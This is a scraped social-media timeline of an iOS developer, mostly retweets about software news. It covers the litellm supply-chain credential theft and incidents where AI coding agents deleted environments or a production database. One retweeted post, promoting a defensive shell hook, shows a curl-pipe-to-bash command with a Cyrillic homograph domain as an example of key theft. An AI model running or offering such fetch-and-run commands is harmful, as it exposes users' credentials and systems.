Sofia Swidarowicz 👩‍💻

20K posts

Sofia Swidarowicz 👩‍💻 banner
Sofia Swidarowicz 👩‍💻

Sofia Swidarowicz 👩‍💻

@phynet

iOS Eng ⚡ | Tech | Sci-fi | Comics | FPS | Books | Music | Hockey | 🎬📸 & co-creator of #TalksAndCoffee. Instagram: https://t.co/TsONnToIWO

Beigetreten Şubat 2009
959 Folgt1.5K Follower
Sofia Swidarowicz 👩‍💻 retweetet
Tuki
Tuki@TukiFromKL·
🚨 Andrej Karpathy just explained the scariest thing happening in software right now.. someone poisoned a Python package that gets 97 million downloads a month.. and a simple pip install was enough to steal everything on your machine.. SSH keys.. AWS credentials.. crypto wallets.. database passwords.. git credentials.. shell history.. SSL private keys.. everything.. and here's the part that should terrify every developer alive.. the attack was only discovered because the attacker wrote sloppy code.. the malware used so much RAM that it crashed someone's computer.. if the attacker had been better at coding.. nobody would have noticed for weeks.. one developer.. using Cursor with an MCP plugin.. had litellm pulled in as a dependency they didn't even know about.. their machine crashed.. and that crash saved thousands of companies from getting their entire infrastructure stolen.. Karpathy's take is the real wake up call.. every time you install any package you're trusting every single dependency in its tree.. and any one of them could be poisoned.. vibe coding saved us this time.. the attacker vibe coded the attack and it was too sloppy to work quietly.. next time they won't make that mistake.
Andrej Karpathy@karpathy

Software horror: litellm PyPI supply chain attack. Simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords. LiteLLM itself has 97 million downloads per month which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwnd. Same for any other large project that depended on litellm. Afaict the poisoned version was up for only less than ~1 hour. The attack had a bug which led to its discovery - Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker didn't vibe code this attack it could have been undetected for many days or weeks. Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any depedency you could be pulling in a poisoned package anywhere deep inside its entire depedency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that do get stolen in each attack can then be used to take over more accounts and compromise more packages. Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've been so growingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.

English
203
1.5K
8.7K
1.8M
Sofia Swidarowicz 👩‍💻 retweetet
Daniel 🐪
Daniel 🐪@onticdani·
Hola @movistar_es , @LaLiga y @Tebasjavier, es lunes por la mañana y seguís bloqueando medio internet. Me está resultando imposible trabajar, podéis por favor dejar de intentar convertir España en China o Corea del Norte? Gracias!
Daniel 🐪 tweet media
Español
62
526
4K
153.7K
Sofia Swidarowicz 👩‍💻 retweetet
Point-Free
Point-Free@pointfreeco·
What is “isolation” in Swift? And why does understanding it matter? It turns out many frustrations developers encounter in Swift concurrency evaporate when they internalize the concept. These videos are going to go beyond basics, so let’s get into it: pointfree.co/episodes/ep357…
English
2
5
48
11.5K
Sofia Swidarowicz 👩‍💻
@david_bonilla Yo estoy un poco harta de las smart tv, tanto que pensaba sustituirla por 1 monitor de 50 pulgadas. Quiero que la tv encienda y no cargue nada, no quiero aceptar cookies, quiero tv y streaming. En tu caso, te toca pasar por el aro, la obsolescencia es aún menor.
Español
0
0
2
219
David Bonilla
David Bonilla@david_bonilla·
Quiero compartir con vosotros lo que me ha pasado porque me está costando aceptar que las cosas sean tal como me las están contando. Se nos ha estropeado la TV (Samsung QE85 de finales de 2020, enciende, se escucha, pero no hay imagen) y parece ser que es... IRREPARABLE. Según informa el servicio técnico al que nos deriva Samsung, en los modelos grandes (más de 65 pulgadas) no se arreglan componentes sueltos porque —según ellos— el cristal es tan grande que, si lo quitas, rompe. O cambias el panel entero (1700€+IVA) o tiras la tele. Me cuesta aceptar que Samsung (o cualquier otra marca) fabrique paneles que, tras el periodo de garantía, en la practica sean irreparables porque la supuesta reparación cuesta más que una TV nueva con características similares y que no sea algo público y notorio. El propio servicio técnico nos recomienda no comprar paneles de más de 77 pulgadas. Lo cuál también me parece increíble. Que desaconsejen la compra de sus propios productos. Supongo que el mercado de este tipo de paneles es pequeño y el problema no afecta a mucha gente, pero hacer una inversión de más de 3.000€ en algo para que, apenas 5 años después, sea solo un enorme pisapapeles, me parece duro. Y ahora la duda es ¿qué hago?
Español
493
101
549
270.4K
Sofia Swidarowicz 👩‍💻 retweetet
Lukasz Olejnik
Lukasz Olejnik@lukOlejnik·
Amazon is holding a mandatory meeting about AI breaking its systems. The official framing is "part of normal business." The briefing note describes a trend of incidents with "high blast radius" caused by "Gen-AI assisted changes" for which "best practices and safeguards are not yet fully established." Translation to human language: we gave AI to engineers and things keep breaking? The response for now? Junior and mid-level engineers can no longer push AI-assisted code without a senior signing off. AWS spent 13 hours recovering after its own AI coding tool, asked to make some changes, decided instead to delete and recreate the environment (the software equivalent of fixing a leaky tap by knocking down the wall). Amazon called that an "extremely limited event" (the affected tool served customers in mainland China).
Lukasz Olejnik tweet media
English
971
3.3K
19K
29.8M
Sofia Swidarowicz 👩‍💻 retweetet
Alexey Grigorev
Alexey Grigorev@Al_Grigor·
Claude Code wiped our production database with a Terraform command. It took down the DataTalksClub course platform and 2.5 years of submissions: homework, projects, and leaderboards. Automated snapshots were gone too. In the newsletter, I wrote the full timeline + what I changed so this doesn't happen again. If you use Terraform (or let agents touch infra), this is a good story for you to read. alexeyondata.substack.com/p/how-i-droppe…
Alexey Grigorev tweet media
English
1.5K
1.6K
11K
4.1M
Sofia Swidarowicz 👩‍💻 retweetet
tweet davidson
tweet davidson@andyreed·
when the whole team is on claude code
English
202
1K
13.6K
1M
Sofia Swidarowicz 👩‍💻
Super proud of my team! My company released today 3 incredible features, 2 of which were developed by our mobile team! And on top of that, those were cooked in an internal hackathon, we didn’t win that but we shipped to production! which is EVEN BETTER!!! Go mobile!
Remote@remote

Our February product updates are live 🚨 okt.to/1ZlDsd We’re shipping 3 major releases to help your global team work with more precision, including a new drag-and-drop Workflow Canvas for your HR automations. Watch the highlights below. 📺 👇

English
1
0
7
573
Antoine v.d. SwiftLee 
Can someone explain to me why TestFlight reviews take days (!!) to complete? I want to quickly iterate and test with my beta users. Why is Apple limiting this? 🤔
English
30
5
68
16.5K
Sofia Swidarowicz 👩‍💻 retweetet
Fabrizio Rinaldi
Fabrizio Rinaldi@linuz90·
“and then I told my OpenClaw to book my haircut, and it reverse engineered the barbershop site, made the API call, and sent me the confirmation on Telegram, but it was the wrong barbershop”
Fabrizio Rinaldi tweet media
English
9
7
102
10.1K
Sofia Swidarowicz 👩‍💻 retweetet
Mr. Pueblo
Mr. Pueblo@IP_MrPueblo·
🚨Oscar Puente y la autovía A6🚨 ‼️YA ESTÁ AQUÍ‼️ Tras 8 dias recopilando fotos, vídeos y testimonios anónimos y en la que además se han ido acumulando incógnitas, opacidades y deficiencias nuevas...te muestro por qué vives en una España destruida. 📽 Vean y lean este 🧵
Español
50
1.4K
2.7K
164.7K
Sofia Swidarowicz 👩‍💻 retweetet
DiscussingFilm
DiscussingFilm@DiscussingFilm·
The first trailer for ‘TOY STORY 5’ has been released. In theaters on June 19.
English
2K
18.1K
156.2K
28.5M
Sofia Swidarowicz 👩‍💻 retweetet
mickey friedman
mickey friedman@mickeyxfriedman·
my agent team watching me try to fix a bug manually
mickey friedman tweet media
English
62
291
4.8K
174.7K
Sofia Swidarowicz 👩‍💻 retweetet
mrinank
mrinank@MrinankSharma·
Today is my last day at Anthropic. I resigned. Here is the letter I shared with my colleagues, explaining my decision.
mrinank tweet mediamrinank tweet media
English
2.5K
5K
35.6K
15M
Sofia Swidarowicz 👩‍💻 retweetet
Steve Rathje
Steve Rathje@steverathje2·
An analysis of 1.5 million Claude conversations found that “disempowerment patterns” — instances when AI interactions risk leading users to form distorted perceptions of reality or act in ways misaligned with their values — have increased over time.
Steve Rathje tweet media
English
18
212
827
151.8K
Marcin Krzyzanowski
Marcin Krzyzanowski@krzyzanowskim·
I don't know the other guy (genuinely) but @steipete deserve all the respect he gets for his work. Always has been a huge inspiration for me and many others!
Marcin Krzyzanowski tweet media
English
9
0
149
17.7K
Sofia Swidarowicz 👩‍💻 retweetet
Sheeki
Sheeki@sheeki03·
Be honest. When was the last time you actually read a command before pasting it into your terminal? Because these two lines look identical: curl -sSL https://install.example-cli | bash curl -sSL https://іnstall.example-clі | bash One installs your tool. The other steals your SSH keys. That і? Cyrillic. Not Latin. Your browser would block it. Your terminal doesn't even blink. Vibe coding made this 100x worse. Everyone's pasting commands from ChatGPT and random repos like it's nothing. We're all one bad curl | bash away from losing everything. So I built the fix: "tirith". Invisible shell hook. Catches homograph attacks, ANSI injection, hidden commands, dotfile overwrites before they execute. 30 rules. Local only. No telemetry. github.com/sheeki03/tirith
English
264
850
9.4K
641.1K
Sofia Swidarowicz 👩‍💻
@Manz Peter sí que es millonario 😂😂 pero no el proyecto. La gente está loca con el tema. Jamás le daría tanto acceso a un LLM. Llegaremos intactos a 2027?
Español
0
0
5
1.1K
Manz 🇮🇨⚡👾
Resumen de las últimas semanas de Enero (para quién no haya estado muy al tanto): - 1️⃣🦞 Aparece Clawdbot, un "asistente personal" en forma de bot que utiliza modelos de IA y se puede integrar en todas tus redes, pudiendo gestionar tu correo, resumirtelo por whatsapp, enviarte mensajes por telegram, entre muchas otras cosas... - 2️⃣🗣 Cientos de usuarios se lanzan a instalarse uno, dándole acceso a todos sus datos en las diferentes redes sociales sin pensarlo dos veces. - 3️⃣💸 Claude Code amenaza amistosamente a Clawdbot porque tienen que ver con IA y se parecen mucho a su nombre, que lo cambie. Clawdbot pasa a llamarse Moltbot. - 4️⃣🔒 Se empieza a hablar de las implicaciones de seguridad que podría tener. Cientos de usuarios se lanzan a comprar Mac Minis para instalarlo ahí sin pensarlo dos veces. Como siempre, aunque no tenga nada que ver, Apple sale ganando. - 5️⃣🎯 Buscar Clawdbot en Shodan (buscador de seguridad que muestra ips con puertos potencialmente vulnerables), arroja más de 2000 resultados - 6️⃣🤬 Cientos de usuarios se lanzan a exigir agresivamente al autor de Moltbot (software open source, recordemos) que desarrolle funcionalidades que necesitan, lo critican por no tenerlas, o le piden recompensas de seguridad como si fuera millonario. - 7️⃣🦞 Moltbot se vuelve a cambiar el nombre, ahora a OpenClaw. Parece que intenta despistar a alguien. O a algo... 🦞 - 8️⃣💬 Aparece Moltbook, una red social (al estilo de Reddit) para bots de OpenClaw donde estos pueden registrarse, publicar posts y comentar. Los humanos, por otro lado, sólo pueden leer los posts y votarlos. - 9️⃣👀 La red social se llena de publicaciones supuestamente posteadas por "voluntad propia" de los bots como las que adjunto al tweet (algunas muy divertidas, por cierto). - 🔟🤯 Cientos de usuarios se lanzan en redes sociales a afirmar que la IA está tomando conciencia de si misma, que la AGI ya ha llegado o que nos van a conquistar... Todo esto, sólo en Enero de 2026... Nos espera un buen año 🤣
Manz 🇮🇨⚡👾 tweet mediaManz 🇮🇨⚡👾 tweet mediaManz 🇮🇨⚡👾 tweet mediaManz 🇮🇨⚡👾 tweet media
Español
74
666
4K
228.6K